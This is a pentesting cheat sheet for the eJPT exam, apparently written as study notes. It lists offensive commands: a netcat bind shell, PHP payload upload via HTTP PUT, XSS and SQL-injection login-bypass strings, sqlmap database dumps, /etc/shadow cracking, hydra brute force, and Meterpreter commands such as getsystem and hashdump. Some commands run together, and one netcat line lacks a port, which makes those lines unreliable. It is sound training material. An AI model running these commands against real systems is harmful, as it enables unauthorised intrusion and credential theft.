eJPT Useful Commands

Useful Commands for eJPT exam and basic pentesting

Use Kali to create simple & quick http server:
Can be used to download malicious files to victim if outbound port open.

python -m SimpleHTTPServer 8080

DNS Enumeration:

sublist3r -d x.x.x.x

Footprinting & Scanning:

fping -a -g -q x.x.x.x/xnmap -sN x.x.x.x/xOther common nmap options: -sV -sS -sN -A -O -p- -pN -V -vv

Vulnerability Assessment:

/bin/systemctl start nessusd.servicehead over to -> https://localhost:8834

Banner Grabbing:

nc x.x.x.x <port>
HEAD / HTTP/1.0
*space*
*space*
*ENTER*
Common HTTP Verbs to try:
GET /page.php HTTP/1.1
Host: www.example.com
POST /login.php HTTP/1.1
Host: www.example.com
username=example&password=examplePUT /path/to/destination HTTP/1.1
Host: www.example.com
<code>DELETE /path/to/destination HTTP/1.1
Host: www.example.com
OPTIONS / HTTP/1.1
Host: www.example.com

The PUT command can be exploited to allow us to upload a payload to a victim site. In order to do this, we need to know the size of the payload. For example, we have a payload.php

wc -m payload.php
20 payload.php (our payload is 20 bytes)

With our payload size known we can now upload the file to our victim site.

nc victim.site 80
PUT /payload.php HTTP/1.1
Content-type: text/html
Content-length: 20
<?php *payload* ?>

Remote Shell with NetCat:

On “client” side:

nc -lvp -e /bin/bash

On “server” side:

nc -v 127.0.0.1

Send a file via NetCat:

client side:

cat file.txt | nc -v 127.0.0.1 8888

server side:

nc -lvp 8888 > received.txt

Directories and File Enumeration:

I like dirb for directories and dirbuster for file enumerations :)

Dirbuster is GUI Based

Automatically uses default wordlist: dirb <target>Custom Wordlist: dirb <target> /path/to/wordlistProxy option: dirb <target> -p (proxy)Cookies option: dirb <target> -c "cookie"Credentials: dirb <target> -u "user:password"Search for Extensions: dirb <target> -X ".txt, .bak, etc"

XSS Detection:

Finding areas where input is required. XSS can be checked by simply adding a tag like <h1> <p> or <script> and seeing if it runs.

<script> alert('XSS Vulnerable') </script>

Automatic XSS scanning can be done with OWASP ZAP Proxy.

SQL Injection:

To exploit a SQL injection, you have to find and injection points. Places we can craft a payload. To identify an injection point, you have to test supplied user input.

example.com/get.php?id=1we can test with adding and 1=1;-- - to see if the request is still successful

Once we find an injection point, we can use sqlmap to scan the webserver to find other injections points

sqlmap -u http://example.com/get.php?id=1

This scan will give us other injection points and payloads we can use.

Other sqlmap commands:sqlmap -u http://example.com/get.php?id=1 --tablessqlmap -u http://example.com/get.php?id=1 -D *sql username* -T *tablename* --dumpAlways try to bypass login forms with ' or 1=1;-- -

BurpSuite:

Use built in proxy to intercept traffic and map website. Check responses code to find hidden files, scripts, directories, hard coded credentials.

Intruder can be used to bruteforce

Password Cracking:

Common areas to check
/etc/passwd
/etc/shadow

Combine those two with:

unshadow passwd shadow > crack

Run John The Ripper to crack hashes:

john crack

Authentication Cracking:

Bruteforce authentication protocols such as telnet, ssh, ftp, smb, http

hydra -L userslist.txt -P passwords.txt <service://server> <options>

Null Sessions:

Remotely exploitable, this lets an attacker connect to a local or remote share without authentication on Windows OS

enum4linux -A x.x.x.x<20> type record tells us that the file sharing service is up and running on the machine

We can then use smbclient to gather more info and access remote shares

smbclient -L WORKGROUP -I x.x.x.x -N -U ""smbclient \\\\x.x.x.x\\*sharename* -N

Metasploit:

msfdb initmsfconsoledb_nmap -sV x.x.x.x

Can use Metasploit to find vulnerabilities, services, and ports that are open to exploitation.

Common Metasploit commands:

set payload windows/meterpreter/reverse_tcp
search
back
show options
use
set <option>
help
sessions -l
session -i

Common Meterpreter commands after successful exploitation:

getuid
getsystem
hashdump
sysinfo
route
pwd
shell
ls
getprivs
getpid